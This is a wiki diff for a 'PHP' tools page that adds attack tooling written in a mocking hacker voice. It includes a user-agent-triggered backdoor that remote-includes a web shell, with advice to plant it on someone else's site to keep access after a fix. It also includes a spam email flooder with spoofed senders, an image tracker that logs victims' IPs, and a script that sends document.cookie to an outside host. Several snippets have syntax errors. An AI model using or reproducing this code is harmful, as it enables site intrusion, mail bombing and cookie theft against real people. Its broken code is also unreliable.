User Tools

Site Tools

tools:php

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision		Previous revision
tools:php [2024/06/03 03:40] – [Do-while loops] Humphrey Boa-Garttools:php [2024/08/06 05:48] (current) – external edit 127.0.0.1
Line 1: Line 1:
-{{wst>iw-import}}+{{wst>iw-cleanup}}
  
 ====== PHP ====== ====== PHP ======
Line 309: Line 309:
 ==== Simple Backdoor in PHP ==== ==== Simple Backdoor in PHP ====
  
 +Because many of you want to go straight to the uber hax, I'll add this little bit in. Please stop reading and Google up the following if you don't know this already:
 +
 +1. Basic Understanding of PHP 2. Remote File Inclusion 3. Basic web hacking 4. Web shell (c99, x2300 Locus7s, r57, etc.) 5. User Agents and how to change them
 +
 +Now that you have an idea of what these are, here is how to backdoor a page. If you have access to someone's website, you can slip in this little bit into the PHP page to backdoor their site. When you visit that page with the specified user agent, a web shell will automatically be included. Backdooring a site is recommended for most purposes, because if the site fixes whatever vulnerability you used to get in, you'll still have access. Anyways here is the backdoor:
 +
 +  <?php
 +  $blackdoor = $_SERVER['HTTP_USER_AGENT']; 
 +  if($blackdoor == "PUT YOUR USER AGENT HERE) 
 +   
 +    @include('PUTTHEURLTOYOURWEBSHELLHERE'); 
 +   
 +  ?>
 ==== Email flooder in PHP ==== ==== Email flooder in PHP ====
  
-===== Image bugs =====+If you want to just copy this and run it off a server, go ahead. Unfortunately most free PHP hosts don't allow you to send mail, but I guess you can run it off your localhost. You must have access to the sendmail binary on your system to run; it's just a matter of configuring php.ini, which I won't go into now. 
 + 
 +You need to have: 
 + 
 +1. a server 2. basic knowledge of PHP 3. knowledge on how to install/configure your PHP (pop quiz: should register_globals be kept on or off?) 
 + 
 +  <?php 
 +     $spam= $_POST["spams"];  
 +  // define number of spam cycles 
 +   
 +     $iloled = $_POST["message"]; 
 +  // this is the message 
 +   
 +     $email = $_POST["email"]; 
 +  // define recipient 
 +   
 +     $rofl = $_POST["body"]; 
 +  // your message 
 +   
 +     function head() { 
 +        $sender = $_POST["sender"]; 
 +        $header = 'MIME-Version: 1.0 \r\n 
 +     Content-type: text/html; charset=iso-8859-1 \r\n 
 +     From: <' . $sender . '>'; 
 +   
 +        return($header); 
 +     } 
 +  // spoofed header. i found it easier to write it this way. 
 +   
 +     if(isset($_POST["email"])) { 
 +        for($i = 1; $i <= $spam; $i++){ 
 +   
 +           for($ii = 0; $ii <= $_POST["spams"]; $ii++){ 
 +   
 +              mail($_POST["email"], $iloled,$rofl,head()); 
 +   
 +           } // (the second for loop) defines one cycle 
 +   
 +           echo "Done $i loops of $spam 
 +  "; //we're done 
 +    
 +        } 
 +     echo "Complete.";  
 +     } 
 +     else { 
 +   /* if the form isn't filled out show it. also, mess around with this  part any way you like. */ 
 +  ?>   
 +  <form method="post" action=""> 
 +   
 +     Victim: <input type="text" size="28" name="email">   
 +      
 +     Message title: <input type="text" size="28" name="message">   
 +      
 +     Sender (spoof it): <input type="text" size="28" name="sender"> 
 +      
 +     Message body: <textarea name="body" cols="28" rows="5"></textarea>   
 +      
 +     Emails per cycle (default 10): <input type="text" size="28" name="spams" value="10">   
 +      
 +     Cycles (default 10):<input type="text" size="28" name="cycles" value="10">  
 +        
 +     <input type="submit" name="submit" value="Click for lulz"> 
 +      
 +  </form>   
 +  <?php  
 +  } 
 +  ?> 
 +   
 +===== Image Bugs ===== 
 + 
 +Pretty fucking simple, really. You insert the following into an e-mail or something: 
 + 
 +
 + 
 +Then in iplulz.php on your server (or whatever you call it), put this code: 
 + 
 +//PROTIP: Make a directory on your server called image.png or any image name, then save the code as index.php in the directory.// 
 + 
 +  <?PHP 
 +  $the_image = "yourimagehere.jpg"; 
 +  $ip_lister = fopen("ip.list", "a+"); 
 +  fwrite($ip_lister, $_SERVER['REMOTE_ADDR'] . " fell for it lol\n"); 
 +  fclose($ip_lister); 
 +  if (!strncasecmp(substr($the_image, strlen($the_image) - 4), ".jpg"))    
 +  $image_mime = "jpeg"; 
 +  else $image_mime = substr($the_image, (strrpos($the_image, '.') + 1)); 
 +  header("Content-Type: image/$image_mime"); 
 +  echo file_get_contents($the_image); 
 +  ?> 
 + 
 +User gets the image, you get their IP added to a list. EVERYONE WINS 
 + 
 +Also, can steel cookies in dat way: 
 + 
 +  <?PHP 
 +  $the_image = "yourimagehere.jpg"; 
 +  $ip_lister fopen("ip.list", "a+"); 
 +  fwrite($ip_lister, $_GET['d0ngz'] . " lol\n"); 
 +  fclose($ip_lister); 
 +  if (!strncasecmp(substr($the_image, strlen($the_image) - 4), ".jpg"))    
 +  $image_mime "jpeg"; 
 +  else $image_mime substr($the_image, (strrpos($the_image, '.') + 1)); 
 +  header("Content-Type: image/$image_mime"); 
 +  echo file_get_contents($the_image); 
 +  ?> 
 + 
 +And in email or whatevastuff put 
 + 
 +  <script> 
 +  document.write("<img src='http://domain.com/index.php?d0ngz="+ document.cookie+"'> 
 +  ') 
 +  </script> 
  
-{{tag>Tools Programming Stubs}}+{{tag>Tools Programming}}
tools/php.1717386021.txt.gz · Last modified: 2024/08/06 05:52 (external edit)

Find this page online at: https://bestpoint.institute/tools/php